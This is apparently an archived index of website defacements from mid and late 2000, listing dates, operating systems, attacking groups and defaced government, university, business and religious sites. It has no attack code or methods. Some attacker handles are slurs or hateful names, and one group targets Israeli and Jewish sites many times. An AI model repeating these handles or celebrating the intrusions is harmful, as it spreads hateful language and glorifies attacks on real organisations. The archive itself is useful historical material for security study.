      [00.11.09] 2k [rapeworm]             All Clubs and Star Listings (allclubs.com.au)
      [00.11.09] NT [JaCo]                 Spendless (www.spendless.co.il)
      [00.11.08] IR [Anti Security]    M   Florida State University (www.iri.fsu.edu)
      [00.11.08] Bf [Crazy Horse]          Peter Fielding Photography (www.mountainimagery.com)
      [00.11.08] 2k [prime suspectz]       www.nasa.com.uy (www.nasa.com.uy)
      [00.11.08] NT [kbr]                  Governo Do Estado De Sao Paulo (www.fundap.sp.gov.br)
      [00.11.08] NT [Gforce Pakistan]      Terminal - Computers & Multimedia (www.terminal.co.il)
      [00.11.08] NT [prime suspectz]       Nextel Telecomunicacoes (www.nextel.com.br)
      [00.11.08] Ir [DHC]              M   SZ Audit (www.szaudit.org.cn)
      [00.11.08] NT [Gforce Pakistan]      Rooster (mail.rooster.co.il)
      [00.11.08] Sc [Havoc Korp]           New England Club Managers Association (www.necma.org)
      [00.11.08] NT [Gforce Pakistan]      Radwiz (IL) (www.radwiz.co.il)
      [00.11.08] NT [Dcoder]               Pilipino Telephone Corporation Official Website (homepage.piltel.com.ph)
      [00.11.08] UN [Halik]                Government Printing Office (www.gpo.gov)
      [00.11.08] Li [r0b1n h00d slu7]      Foto Concepts (www.foto-concepts.de)
      [00.11.08]    [prime suspectz]       Asics (www.asics.co.za)
      [00.11.08] NT [azndragon]            EcoNet (dns.econet.it)
      [00.11.08] NT [m0r0n/nightman]       Gvanim Financim, Kibutz Shefayim Israel (www.gvanim.co.il)
      [00.11.08] NT [m0r0n/nightman]       Hed-Arzi (www.hed-arzi.co.il)
      [00.11.08] NT [tR|cky]           MC  Order in a Click (www.order-click.co.il)
      [00.11.08] NT [Gforce Pakistan]      KIS Technologies (www.kisnet.co.il)
      [00.11.08] NT [aniclator]            United States Geological Survey (mrdata.usgs.gov)
      [00.11.08] NT [Gforce Pakistan]      Ornetix (ntserver.ornetix.co.il)
      [00.11.08] Ir [Crime Boys]           Aiman Co (www.aimanco.com.cn)
      [00.11.08] Li [Web Claws]        M   Accueil Scorp - Motorsport (www.scorpmotorsport.com)
      [00.11.08] NT [Gforce Pakistan]      Chamber  (IL) (www.chamber.org.il)
      [00.11.08] NT [prime suspectz]       Presidencia de la Repblica de Mexico (www.presidencia.gob.mx)
      [00.11.08]    [GForce Pakistan]      University of Michigan Transportation Research Institute
      [00.11.08] Lr [pakistan is gay]      Urmia University in Iran (mail.urmia.ac.ir)
      [00.11.08] NT [Anti-401 Crew]        Toronto Zionist Council (www.torzc.org)
      [00.11.07]    [Fenrir]               TGIF Online (www.tgifonline.com)
      [00.11.07] Lr [philer]               Detroit Tradesmen (www.detroittradesmen.com)
      [00.11.07] Bi []                     Webdesign (www.opsaal.de)
      [00.11.07] NT [AnIcLaToR]            Departamento Nacional de Producao Mineral (www.dnpm.gov.br)
      [00.11.07] NT [m0r0n/nightman]       Efrat DSP Group (www.efratdsp.co.il)
      [00.11.07] NT [AnIcLaToR]            Aneel-Agencia Nacional de Energia Eletrica (hidroweb.aneel.gov.br)
      [00.11.07] NT [m0r0n & nightman]     Elgev Electronics (www.elgev.co.il)
      [00.11.07] NT [AnIcLaToR]            Governo Do Estado De Sao Paulo (www2.fazenda.sp.gov.br)
      [00.11.07] NT [prime suspectz]       #4 Australian Broadcasting Authority (www.aba.gov.au)
      [00.11.07] NT [RB Team]              Ministerio de Comercio Exterior de Costa Rica (www.comex.go.cr)
      [00.11.07] Li [r00tshell]            No BMW Syndrome (www.nobmwsyndrome.com)
      [00.11.07] NT [Anti Security]     C  DFM - FFCLRP - USP Ribeiro (dfm.ffclrp.usp.br)
      [00.11.07] Li [r0b1n h00d slu7]  M   Scottish Right Dormitory (www.srd.org)
      [00.11.07] NT [ ]               A    Microsoft Events server (events.microsoft.com)
      [00.11.07] NT [thepr0digy]           National Library of Australia (webpac.nla.gov.au)
      [00.11.07] NT [syf]              M   Gerber Landscape (www.gerberco.com)
      [00.11.06] NT []                  C  Republican National Committee (www.gop.org)
      [00.11.06] NT [ScorpionKTX]          Confeccoes Simon-Brain Ltda (www.pitt.com.br)
      [00.11.06] So [GForce Pakistan]      Torah Educator (www.toraheducator.org)
      [00.11.06] Li [GForce Pakistan]      CentExchange (www.centexchange.com)
      [00.11.06] NT [prime suspectz]       Partido Da Social Democracia (www.psdb.org.br)
      [00.11.06] Li []                     Squadpage Online Gaming (www.squadpage.com)
      [00.11.06] Li [r0b1n h00d slu7]   C  Ball & Chain Industries (www.tonguejoy.com)
      [00.11.06] NT [prime suspectz]   M   Nintendo (ZA) (www.nintendo.co.za)
      [00.11.06] So [GForce Pakistan]      Borha Torah (www.borhatorah.org)
      [00.11.06] NT [Prime Suspectz]       Nintendo Mexico (www.nintendo.com.mx)
      [00.11.06] NT []                     ICCU (iccu.sbn.it)
      [00.11.06] NT [anti security]     C  Web Tecnologia Servicos e Comercio (www.estudioweb.com.br)
      [00.11.06] Li [robin hood slut]      The Robinson Group (www.theadmiral.com)
      [00.11.06] So [GForce Pakistan]      Partners in Torah (www.partnersintorah.org)
      [00.11.06] Lr [hooyah]           M   Knowledge House Inc. (nsdev3.knowledgehouse.net)
      [00.11.05] IR [Ezkracho]             Manuel Luis Zamudio Rodrguez (www.redmkt.com)
      [00.11.05] NT [prime suspectz]   M   MINISTERIO DO TRABALHO (www.mte.gov.br)
      [00.11.05] Li [r0b1n h00d]           Hotel - Gasthof Kirchmayer (www.kirchmayer.de)
      [00.11.05] So [brain storm]          STUDIO DE TATOUAGE CRYSTAL MAGIC ENR. (www.studiocrystalmagic.com)
      [00.11.05] Lb [g0mb0]                InfoCon Mongola (www.infocon.mn)
      [00.11.05] So [GForce Pakistan]      Jerusalem Books (www.jerusalembooks.com)
      [00.11.05] NT [prime suspectz]   M   Kenwood Chile (www.kenwood.cl)
      [00.11.05] Li [r0bb1n h00d]          Blue Moon Security (www.bluemoonsecurity.de)
      [00.11.05] NT [lion & type_o]     C  Shaheed Zulfiqar Ali Bhutto Institute of Science and Technology (www.szabist.edu.pk)
      [00.11.05] NT [IHA]                  National Tax Association (www.ntanet.org)
      [00.11.05] NT [AnIcLaToR]        M   Zoomix Suplementao Animal Ltda (www.zoomix.com.br)
      [00.11.05] 2k [brake off]            James Raddock (www.raddock.com)
      [00.11.05] Li [Mr.P]             M   Kelley Studios (www.marilynfineart.com)
      [00.11.05] Li [EVIL ANGELICA]        Mirage Television Productions (www.miragetv.com)
      [00.11.05] NT [prime suspectz]       www.figc.it (www.figc.it)
      [00.11.05] NT [SqiSch/zEp]       M   E.C.C. Europe Class Computing S.r.l. (alessiamarcuzzi.com)
      [00.11.05] Lr [Di_QuIp]              wizard.darkzone.trzepak.pl (wizard.darkzone.trzepak.pl)
      [00.11.05] So [GForce Pakistan]   C  All-Kosher Indexof the United Kashrut Authority (www.kosher.co.il)
      [00.11.05] NT [prime suspectz]   M   MCOM Diagnosticos por Imagem S/C Ltda (www.mama.com.br)
      [00.11.05] NT [Galahad]          M   Michlala L'hachsharat Morim (skbb4.skb2.macam.ac.il)
      [00.11.05] 2k [CyBeRpUnK]        MC  Professional Realty (www.berkeleycountyrealtor.com)
      [00.11.05] So [GForce Pakistan]      Pirchei Shoshanim (www.pirchei.co.il)
      [00.11.05] So [GForce Pakistan]      The Ultimate Shabbat Site (www.shabat.co.il)
      [00.11.05] So [GForce Pakistan]   C  World Peace Center (www.worldpeacecenter.org)
      [00.11.04] Lr [dodi]                 Cognifit (www.cognifit.co.il)
      [00.11.04] NT [Black Diamond]        Abentel Comrcio e Representao Ltda (www.abentel.com.br)
      [00.11.04] Lr [CyBeRpUnK]        MC  Alphanet, S.A. de C.V. (www.virsem.com.mx)
      [00.11.04] Bf [Havoc Korp]           www.surfootball.com (www.surfootball.com)
      [00.11.04] NT [azndragon]            istituto agronomico mediterraneo (biopuglia.iamb.it)
      [00.11.04] Li [cid]                  Shenzhen SuperAsia Computer Technology Co.,Limited (www.csuu.com)
      [00.11.04] NT [crazy_bit]            www.telekabel.at (www.telekabel.at)
      [00.11.04] Li [Havoc Korp]           www.anarchy99.net (www.anarchy99.net)
      [00.11.04] NT [m0r0n/nightman]       Bayan Systems, Israel (www.bayan.co.il)
      [00.11.04] NT [lion&type_o]          Ministry of Agriculture, Iran (www.moa.or.ir)
      [00.11.04] Lr [DeTH]                 Brent Norman (www.ottawarcclub.com)
      [00.11.04] Li [Havoc Korp]           www.katakombe.com (www.katakombe.com)
      [00.11.04] NT [philer]           M   Efficient Web Solutions, LLC (www.efficientweb.com)
      [00.11.04] NT [m0r0n/nightman]       Automated Transaction System (www.caspit.co.il)
      [00.11.03] So [GForce Pakistan]   C  Shema Yisrael (www.shemayisrael.co.il)
      [00.11.03] So [GForce Pakistan]      Jen Communications (www.jen.co.il)
      [00.11.03] So [GForce Pakistan]      Health Infosystems Association, Israel (www.healthinfonet.co.il)
      [00.11.03] So [GForce Pakistan]      Visiting Israel Students Association (www.visa.org.il)
      [00.11.03] IR [GForce Pakistan]      Pf1 Systems Ltd. (www.pf1.co.il)
      [00.11.03] NT [rewben]               the hehe.com e-mail service (www.hehe.com)
      [00.11.03] NT [rewben]               Quantum Computer Services (www.myownemail.com)
      [00.11.03] Li [ipx]                  casemiro.castroalves.br (casemiro.castroalves.br)
      [00.11.03] NT [m0r0n]                Yizrael Valley College (Mihlelet Emek Yizrael) (www.yvc.ac.il)
      [00.11.03] So [GForce Pakistan]      Jewish Bible Association (www.jewishbible.org)
      [00.11.03] NT [predator]         MC  www.bos.cg.yu (www.bos.cg.yu)
      [00.11.02] NT [t3aM dANk]            AMT (shop.amt1st.com)
      [00.11.02] NT [bunny]             C  www.motormarkt.nl (www.motormarkt.nl)
      [00.11.02] NT [WeB Claws]        M   www.costruzionesiti.com (www.costruzionesiti.com)
      [00.11.02] 2K [Lord Choo3s]          FORIX - Formula One Results and Information eXplorer (www.forix.com)
      [00.11.02] So [Havoc Korp]           Ravenous Groove Productions (www.ethereality.com)
      [00.11.02] Lr [EVIL ANGELICA]        www.war247.com (www.war247.com)
      [00.11.02] Lr [CyBeRpUnK]        MC  SICA, S.A. DE C.V. (www.asofarma.com.mx)
      [00.11.02] Lr [Blitz]                SimTel Computers DBA (www.simtelcomputers.com)
      [00.11.02] Lr [DeTH]                 SCM Labs, Inc. (www.scmlabs.com)
      [00.11.02]    [Pakistan HC]          The American Israel Public Affairs Committee (www.aipac.org)
      [00.11.02] 2K [grape/squirl]         Arizona K12 Schools (ww2.chandler.k12.az.us)
      [00.11.02] Li []                     Robert Essery (www.whyamisick.com)
      [00.11.02] Sc [RSH]              M   Cybernet (www.cybernetinc.net)
      [00.11.02] NT [Anti Security]        Governo do Estado da Paraiba (ntiserv1.saude.pb.gov.br)
      [00.11.02] NT [m0r0n/nightman]       Shenkar College (www.shenkar.ac.il)
      [00.11.02] NT [rewben]           M   www.wannahaves.nl (www.wannahaves.nl)
      [00.11.02] NT [m0r0n/nightman]       Seminar Hakibutzim (www.smkb.ac.il)
      [00.11.01] So [Havoc Korp]           Royal Jordainian Web Site (www.rja.com.jo)
      [00.11.01] NT [TheKillers]           Marshall Informatica S/C Ltda (www.marshall.com.br)
      [00.11.01] Li [keoki]            M   Silverton Chamber of Commerce (www.silverton.org)
      [00.11.01] NT [azndragon]         C  CIS, University of Bologna (www.cis.unibo.it)
      [00.10.31] NT [McM4nus]              Banco Sudameris Brasil (Jarvis Entertainment Group (Total mirrors count..



      <GAPING HOLE IN COVERAGE GOES HERE>


       Date      OS Group/Person      AMCK Site                              2000
       ~~~~      ~~ ~~~~~~~~~~~~      ~~~~ ~~~~                            ~~~~~~~~
      
      [00.07.13] NT [team legacy]          O'Connor, Piper & Flynn (www.opf.com)
      [00.07.13] Li [SJ/bighawk]           STACK Systems Co. Ltd (www.stacksystems.co.jp)
      [00.07.13] Li [RSH]                  Apollo Dayton (www.apollodayton.com)
      [00.07.13] NT [ov3rh4zz4rd]          ActivityBoard.com (activityboard.com)
      [00.07.13] NT []                     Cox Fibernet (www.coxinet.net)
      [00.07.13] NT [digital insanity]     Maritime Telecommunications Network (www.mtnsat.com)
      [00.07.13] NT [team legacy]          Fordham University (www.fordham.edu)
      [00.07.12] NT [team legacy]          Virginia State University (www.vsu.edu)
      [00.07.12] NT [d00d00 kr3w]          Vaamonde Comunicaciones S.L. (www.bornet.edu)
      [00.07.12] NT [d00d00 kr3w]          Temple University (www.cspd.temple.edu)
      [00.07.12] NT [Papi/ICKIS]           Servicio de Comunicacion en Linea (www.obsession.com.mx)
      [00.07.12] NT [cyb3r fuck3rs]        Universidade de Sorocaba (www.uniso.br)
      [00.07.11] NT [x-s4nd3r]             Ejrcito de Guatemala (www.mindef.mil.gt)
      [00.07.11] NT [team legacy]          Boone County Public Library (www.bcpl.org)
      [00.07.11] So [Gforce Pakistan]      Fermi National Accelerator Laboratory (d0sunmsu1.fnal.gov)
      [00.07.11] Li [RLC]                  Bellevue Tech (www.bellevuetech.com)
      [00.07.11] So [Gforce Pakistan]      Fermi National Accelerator Laboratory 'cdsun2' Server (cdsun2.fnal.gov)
      [00.07.11] So [Gforce Pakistan]      Fermi National Accelerator Laboratory (fncduh.fnal.gov)
      [00.07.11] NT [HCI]                  University of Essex (www2.essex.ac.uk)
      [00.07.11] Li [SJ/bighawk]           Digital Media Interativa Comercio e Servicos (www.dmz.com.br)
      [00.07.11] NT []                     North Dakota Supreme Court Home Page (www.court.state.nd.us)
      [00.07.11] NT []                     Secretaria de Desarrollo Agropecuario y Pesquero (www.sedapver.gob.mx)
      [00.07.11] Ir [NuRaIn-ShAiKh]        Big Buddies (www.bigbuddies.com)
      [00.07.11] La [datagram]             Arisu Media Co,. Ltd (www.arisu.co.kr)
      [00.07.11] NT [Papi and ICKIS]       Servicio de Comunicacin en Lnea (www.prestige.com.mx)
      [00.07.10] NT [Crime Boys]           Gonzaga & Neves Ltda (www.atmnet.com.br)
      [00.07.10] NT [Crime Boys]           www.dgdrural.pt (www.dgdrural.pt)
      [00.07.10] So [GForce Pakistan]      Fermi National Accelerator Laboratory Cmstst Server (cmstst1.fnal.gov)
      [00.07.10] NT [SuBZeRo]              Campus Colima (www.col.itesm.mx)
      [00.07.10] Su [SuBZeRo]              Lazelle Street Land Company (www.sturgisrally.net)
      [00.07.10] Lu [Ben T]                Aegis (www.kjofol.org)
      [00.07.10] NT [do0do0 krew]          University of Texas at Brownsville and Texas Southmost College (www.utbtsc.edu)
      [00.07.10] BI [Team Holocaust]       Owl Kaufpark (www.owl-kaufpark.de)
      [00.07.10] NT [Team Holocaust]       Lance K Hofer (www.lkh.com)
      [00.07.10] NT [McM4nus]              Inst. Brasileiro da Qualidade e Produtividade (www.ibqppr.org.br)
      [00.07.10] BI [Team Holocaust]       AHG Handels-GmbH (www.ahg-art.com)
      [00.07.10] BI [Team Holocaust]   M   Dirk Gross (Elfenwald) (www.elfenwald.de)
      [00.07.10] BI [Team Holocaust]       DV Controlling (Hombergen) (www.hombergen.de)
      [00.07.10] NT [McM4nus]              Fundacao Estudar (www.estudar.org.br)
      [00.07.10] NT [Team Holocaust]       Covenant Health (www.covenanthealth.com)
      [00.07.10] NT [cyb3r fuck3rs]        Ass. Comunicacao Educativa Roquette Pinto (www.tvebrasil.com.br)
      [00.07.10] NT [cyb3r fuck3rs]        Ministerio Do Meio Ambiente (www2.mma.gov.br)
      [00.07.10] NT [cyb3r fuck3rs]        Ass. Comunicacao Educativa Roquette Pinto (www.radiomec.com.br)
      [00.07.09] NT [Anti Security]        Carolina Panthers (www.panthers.com)
      [00.07.09] NT [MADMAN]               Civil Aviation Safety Authority (www.casa.gov.au)
      [00.07.09] NT [id3nt]                Music (TW) (www.music.com.tw)
      [00.07.09] NT [Team Holocaust]       Lyric Opera Cleveland (www.lyricoperacleveland.org)
      [00.07.09] Lr [GForce Pakistan]      ISI Home Page (www.isical.ac.in)
      [00.07.09] Bf [Crime Boys]           Mario Gilberto Eichler Jznior (www.cybernegocios.com.br)
      [00.07.09] NT [Team Holocaust]       Victory Sports Marketing Corp (www.ad-network.com)
      [00.07.09] Li [Gforce Pakistan]      Luv India (www.luvindia.com)
      [00.07.09] NT [suPosix]              Industria De Produtos Alimenticios Cory Ltda (www.icekiss.com.br)
      [00.07.09] Li [Gforce Pakistan]  M   Bollywood Pages (www.bollywoodpages.com)
      [00.07.09] NT [Team Holocaust]       University Heights (www.universityheights.com)
      [00.07.09] NT [x-s4nd3r]             Parlamentsdienste Informatikdienst (www.parliament.ch)
      [00.07.09] NT [:0)]                  US Small Business Classroom (classroom.sba.gov)
      [00.07.09] NT [M3L40]                www.anticorrupcion.gov.co (www.anticorrupcion.gov.co)
      [00.07.09] NT [SuBZeRo]              Central Association of Southern Baptists (www.source1.org)
      [00.07.09] NT [Team Holocaust]       Web Service (www.web-service.com)
      [00.07.08] Li [Crime Boys]           Claudionor Ramos Advocacia E Consultoria Empresari (www.webmultas.com.br)
      [00.07.08] Ir [El Pulpo]             Prodima Alta Tecnologia (www.prodaltec.com)
      [00.07.08] NT [HC Pakistan]          Unsigned UK - Resource for UK Bands (www.unsigneduk.com)
      [00.07.08] Lr [Jfs]                  #2 Openhack -- eWEEK Hacking Challenge (www.openhack.com)
      [00.07.08] NT [HackersCrew]          MBK Media (www.mbkmedia.com)
      [00.07.08] So [Gforce Pakistan]      Convergent Systems (www.tems.com.sg)
      [00.07.08] So [Gforce Pakistan]      Mail Nexus (www.mailnexus.com)
      [00.07.08] Lr []                     I Wanna Know (www.iwannaknow.org)
      [00.07.08] Lr [kortex]               American Social Health Association (www.ashastd.org)
      [00.07.08] So [Gforce Pakistan]      Department of Health and Human Services (vault1.acf.dhhs.gov)
      [00.07.08] Bi [DHC]                  Rubber Snake (www.rubbersnake.com)
      [00.07.08] Lr [DHC]                  Cyber Golf (www.cybergolf.org)
      [00.07.08] So [artech]               Amevic (www.alzheimer-montpellier.org)
      [00.07.08] Lr [Napalm Death]         Happy Web! (www.happy-web.org)
      [00.07.08] NT [SuBZeRo]              Kumho Engineering company, Limited (www.kumhoeng.co.kr)
      [00.07.08] NT [SuBZeRo]              Electronic Display Industrial Research Association (www.edirak.or.kr)
      [00.07.08] NT [M3L4O]                Poli BR (www.poli.usp.br)
      [00.07.08] NT [M3L4O]                CRA Gov (CO) (www.cra.gov.co)
      [00.07.07] Lr [shitkingz]        M   Sebastian Fiebiger & Tobias Stober (www.fs-gbr.com)
      [00.07.07] NT []                     Cookbooks On/Line, Inc (www.cookbooksonline.com)
      [00.07.07] NT [McM4nus]              www.lapampa.gov.ar (www.lapampa.gov.ar)
      [00.07.07] Li [Gforce Pakistan]      Dev Sahai (www.agmoz.com)
      [00.07.07] Lr [GForce Pakistan]  M   Confluent Technologies Inc. (www.bittown.com)
      [00.07.07] NT [cyberpriest]          Boise County Internet Site (www.co.boise.id.us)
      [00.07.07] Li [Crime Boys]           Alamo Administradora e Corretora de Seguros LTDA (www.convergence.com.br)
      [00.07.07] Bi [Arogance]             Thomas Ecker (www.ecker-online.de)
      [00.07.07] Li [Crime Boys]           Allfarma Comercial Ltda (www.lrtur.com.br) 
      [00.07.07] NT [ANALISTA]             Idol Minds (www.idolminds.com)
      [00.07.07] NT [ANTI-ZONCKED]         COTASnet (www.cotas.com.bo)
      [00.07.07] NT [Crime Boys]       M   EDI Informatica LTDA (www.edinternet.com.br)
      [00.07.07] So [rootworm]             University of St Francis (www.stfrancis.edu)
      [00.07.07] NT [SuBZeRo]          M   Lady Furniture Co. Ltd (www.lady.co.kr)
      [00.07.07] 2k [SuBZeRo]              MEGAMEDICAL IND. CO., LTD. (www.megamedical.co.kr)
      [00.07.07] NT [M3L40]                Cinemark US (www.cinemark.com)
      [00.07.06] NT [McM4nus]              Municipalidad Ciudad de Cordoba (www.cordoba.gov.ar)
      [00.07.06] NT [McM4nus]              Sernah (AR) (www.sernah.gov.ar)
      [00.07.06] NT [McM4nus]              INTA Est. Exp. Agr. Saenz Peqa (saenzpe.inta.gov.ar)
      [00.07.06] NT [ANALISTA]             Centro Federal de Educagco Tecnolsgica do Parana (www.cefetpr-unedcp.br)
      [00.07.06] NT [ANALISTA]             Vianna & Zogheib LTDA (www.lpnet.com.br)
      [00.07.06] NT [McM4nus]              Municipalidad Ciudad de Cordoba (www.cordoba.gov.ar)
      [00.07.06] NT [M3L40]                Ministerio de Educacisn Nacional (www.mineducacion.gov.co)
      [00.07.06] NT [Urbanus-BR]           Bitcom (KR) (web.bitcom.co.kr)
      [00.07.06] Li [Crime Boys]           Allfarma Comercial Ltda (www.livretur.com.br)
      [00.07.06] Li [Crime Boys]           Cultura Ensinamentos Ltda (www.experimental.com.br)
      [00.07.06] NT [M3L40]                Corteconti (www.corteconti.it)
      [00.07.06] Lr [Lotus]                South Burlington School District (www.sburl.k12.vt.us)
      [00.07.06] NT [st3althy6 labs]       MSD of Martinsville (msdadmin.scican.net)
      [00.07.06] NT [hackforce2000]        Colorado School of Mines (oia.mines.edu)
      [00.07.06] Bi [team holocaust]       Boy Scout Troop 389 (www.troop389.com)
      [00.07.06] NT [hackforce2000]        Roanoke College (www.roanoke.edu)
      [00.07.06] NT [DrDoug]               Orlandia Equip. Tecnicos Ltda (www.orlatec.com.br)
      [00.07.06] Li [ ]                    Goudvisse (www.goudvisse.com)
      [00.07.06] Li [UPL]                  Auto Restoration Inc. (www.autorestorationinc.com) 
      [00.07.06] NT [x-s4nd3r]             Ministero dei Trasporti e della Navigazione (www.trasportinavigazione.it)
      [00.07.06] Bf [artech]               Northern California Fire Prevention Officers Association (www.norcal-fpo.org)
      [00.07.06] NT [votos locos]          Mississippi State Personnel Board Website (www.spb.state.ms.us)
      [00.07.06] So [GForce Pakistan]  M   Midwest Group (www.bwtc.net)
      [00.07.06] Lr [GForce Pakistan]      The Group 3 (www.thegroup3.com)
      [00.07.06] NT [hackforce]            Ministerul Finantelor - Centrul de Tehnologia Informatiei Financiare (www.mfinante.ro)
      [00.07.06] Lr [shitkingz]        M   Bradley Byrnes (www.icmcomputers.com)
      [00.07.06] NT [obzerve]              Checkmate Management Ltd (www.checkmate.com)
      [00.07.06] NT [Crime Boys]           Bulgarian Government (www.mjeli.government.bg)
      [00.07.06] NT [Crime Boys]           Spider Informatica LTDA (www.spider-df.com.br)
      [00.07.06] NT [Utreg]                McManus and Sons (www.mcmanus.com)
      [00.07.05] NT [M3L40]                Companhia De Informatica Do Parana - Celepar (celepar7.pr.gov.br)
      [00.07.05] Li [Crime Boys]           Jucelia Queiroz Amaral (www.stepcell.com.br)
      [00.07.05] NT [M3L40]                Centro Virtual de Estudos Polmticos (cevep.ufmg.br)
      [00.07.05] Lr [GForce Pakistan]      networksetc.net (www.networksetc.net)
      [00.07.05] Lr [GForce Pakistan]      www.mckenzieonline.com (www.mckenzieonline.com)
      [00.07.05] NT [M3L40]                Kingdom of Saudi Arabia, minstery of information (www.spa.gov.sa)
      [00.07.05] Lr [GForce Pakistan]      NOAA, U.S. Department of Commerce (www.NauticalCharts.gov) 
      [00.07.05] NT [doodoo krew]          Spokane Police Department (www.spokanepolice.org)
      [00.07.05] NT [cyberpriest]          apiit.edu.my (apiit.edu.my)
      [00.07.05] C6 [Till]                 Employee Selection & Dev. Inc (www.employeeselect.com)  
      [00.07.05] NT [cdrz/liasons]         Retro Gallery (www.retro-online.com)
      [00.07.04] NT [fl3m]                 Shear Healthcare Resources, Inc. (www.shrmedquest.com)
      [00.07.04] So [ch1ck1e]              Nerp (www.nerp.org)
      [00.07.04] BI [O ANALISTA]           As Informatica Ltda (www.asinformaticabh.com.br)
      [00.07.04] NT [Crime Boys]           Verbatim Corporation (www.verbatim.com)
      [00.07.04] Lr [shitkingz]        M   Oak Lawn Condos (www.oaklawncondos.com)
      [00.07.04] Li [Crime Boys]           Marinho Assessoria Empresarial Ltda (www.marinhoassessoria.com.br)
      [00.07.04] Lr [mOs]                  Center for Advanced Technology (www.cat.gov.in)
      [00.07.04] NT [dobe and epic]        Austin Peay State University (www.apsu.edu)
      [00.07.04] Lr [shitkingz]            OMI, Inc (www.ofsnet.com)
      [00.07.04] NT [fish]                 Znet Tecnologia Aplicada (www.znet.com.br)
      [00.07.04] Lr [GForce Pakistan]  MC  Sony Entertainment Television Pvt. Ltd. (www.setindia.com)
      [00.07.04] Li [shitkingz]            Darcy Brown (www.scarletpimp.com)
      [00.07.04] NT [#bash krew]           Pennsylvania State System of Higher Education (www.sshechan.edu)
      [00.07.04] Lr [shitkingz]            Huzzah! (white-star.org)
      [00.07.04] NT [never]                New Jersey K12 Schools (www.peddie.k12.nj.us)
      [00.07.04] Lr [shitkingz]            Digital Products (www.digital-p.com)
      [00.07.04] NT [cyberpriest]          Canberra Edu (AU) (beth.canberra.edu.au)
      [00.07.04] NT [Jak/KP]            C  Editors Press Service (www.editorspress.com)
      [00.07.04] Lr [shitkingz]            Burney Van Stone (www.burneyvanstone.com)
      [00.07.04] Li [shitkingz]            The Eden Family (aaron.edenfamily.com)
      [00.07.04] Lr [shitkingz]            Xoltrex (www.xoltrex.com)
      [00.07.04] NT [rapeworm]             UltraNet Communications, Inc. (atserver.nh.ultranet.com)
      [00.07.04] Lr [shitkingz]            pstu.pi.net.ua (pstu.pi.net.ua)
      [00.07.04] NT [wds]                  Anqui Gov (CN) (www.anqiu.gov.cn)
      [00.07.04] NT [Crime Boys]           Facultad de Ciencias Econsmicas y de Administracisn (www.eco.unca.edu.ar)
      [00.07.04] NT [DeXeR]                Oklahoma City University (www.okcu.edu)
      [00.07.04] NT [obzerve]           C  Whittier Partners (www.whittier.com)
      [00.07.04] Li [The Itch]             Meredith Frederick Designs Ltd. (www.meredithfrederick.com)
      [00.07.04] NT [cyberpriest]          www.bhak-frk.asn-bgld.ac.at (www.bhak-frk.asn-bgld.ac.at)
      [00.07.04] NT [cyberpriest]          www.lycee.asn-wien.ac.at (www.lycee.asn-wien.ac.at)
      [00.07.04] NT [wds]                  web.cei.gov.cn (web.cei.gov.cn)
      [00.07.04] NT [wds]                  Kentucky K12 Schools (b-g.k12.ky.us)
      [00.07.04] Bf [Digital insanity]     Igor Zingerman (aps.imperfect.net)
      [00.07.04] NT [cdrz]                 Ontario Secondary School Students' Association (www.osssa.org)
      [00.07.04] NT [Octane]               Michael Smith (Puff Online) (www.puff-online.com)
      [00.07.03] NT [jak/kp]            C  Collectible Toys (www.collectibletoys.com)
      [00.07.03] NT [St3althy6 Labs]       Utah K12 Schools (www.daggett.k12.ut.us)
      [00.07.03] NT [Digit-0]              Lund Performance Solutions (www.lund.com)
      [00.07.03] So [GForce Pakistan]  M   Peng T. Ong (www.secondbeat.com)
      [00.07.03] NT [rapeworm]             NSPlanning Inc. (cue21.nsplanning.co.jp)
      [00.07.03] Li [Crime Boys]           Claudionor Ramos Advocacia E Consultoria Empresari (www.preferido.com.br)
      [00.07.03] 2k [jak]               C  The Sedlaks (www.sedlaks.com) 
      [00.07.03] So [al & mei]             Openhack -- eWEEK Emporium Catalog (www.openhack.com/cgi-bin/eweekorcl)
      [00.07.03] NT [Anti-Zoncked]         Electroid Company (www.electroid.com)
      [00.07.03] NT [Hacker Jak]        C  John McElroy (www.e3online.com)
      [00.07.03] 95 [obzerve]           C  IDEA QUEST UNLIMITED (www.ideaquestunlimited.com)
      [00.07.03] Li [l4m3r cr3wz]       C  Michael Adolph (www.god-crew.de)
      [00.07.03] NT [SuBZeRo]              www.ahone.co.kr (www.ahone.co.kr)
      [00.07.03] NT [cyberpriest]          Bundes Gymnasium Schwechat (www.bg-schwechat.asn-wien.ac.at)
      [00.07.03] NT [cyberpriest]          Gymnasium & Real-Gymnasium Wien 11 (www.grg11.asn-wien.ac.at)
      [00.07.03] NT [DeXeR]                DTS Software (www.dtssoftware.com)
      [00.07.03] NT [wds]                  California K12 Schools (lausdnet01.lausd.k12.ca.us)  
      [00.07.03] NT [rapeworm]             New Media BC (www.newmediabc.com)
      [00.07.03] Lr [acid]                 James Knowles (Digital IRC) (www.digital-irc.net)
      [00.07.02] NT [jak]               C  Ed Guy (www.edguy.com)
      [00.07.02] Li [Crime Boys]           Cunha Lanfermann Engenharia Ltda (www.projetosenegocios.com.br)
      [00.07.02] Li [datagram]             Dayton Internet Services, Inc (www.dayton.com)
      [00.07.02] NT [rapeworm]             Inglenet Software Corporation (www.merchantbridge.com)
      [00.07.02] NT [wds]                  California K12 Schools (nevco.k12.ca.us)
      [00.07.02] NT [rapeworm]             Icron Systems Inc (www.icron.com)
      [00.07.02] NT [rapeworm]             Inglenet Software Corp (iscnt2.inglenet.com)
      [00.07.02] NT [IZ Corp]              Medical School, UCLA (www.pathnet.medsch.ucla.edu)
      [00.07.02] NT [Crime Boys]           Pagina Oficial del M.G.A.P. (www.mgap.gub.uy)
      [00.07.02] Lm [rmImJ3c1PgFt2]        Root-bega (www.r00tabega.com)
      [00.07.02] NT [rapeworm]             Derived Systems, Inc (nt40-2.derived.com)
      [00.07.02] NT [Urbanus-BR]           University of Tartu, Estonia (ois.oppe.ut.ee)
      [00.07.02] NT [Urbanus-BR]           Israeli ORG (sdeyoav) (www.sdeyoav.org.il)
      [00.07.02] So [fluffi bunni]         Official #EnglishPub Home Page (www.englishpub.co.uk)
      [00.07.02] Li [SoLDaTeK]             West Yorkshire Broadcasting (www.magic828.co.uk)
      [00.07.02] Li [SuBZeRo]              Israeli Commercial (www.bookkeeper.co.il)
      [00.07.02] NT [Jak]               C  Sarasota Amateur Radio Association (www.saraclub.org)
      [00.07.02] 2k [Jak]                  The Steel Network (www.studplank.com)
      [00.07.01] NT [Cyb3r Fuck3rs]        Monumentos Historicos Nacionales (www.monumentos.gov.ar)  
      [00.07.01] NT [McM4nus]              Universitaet Zuerich (www.isb.unizh.ch)
      [00.07.01] Bi [DavidLetterman]       Grace House Ministries (www.gracehouse.org)
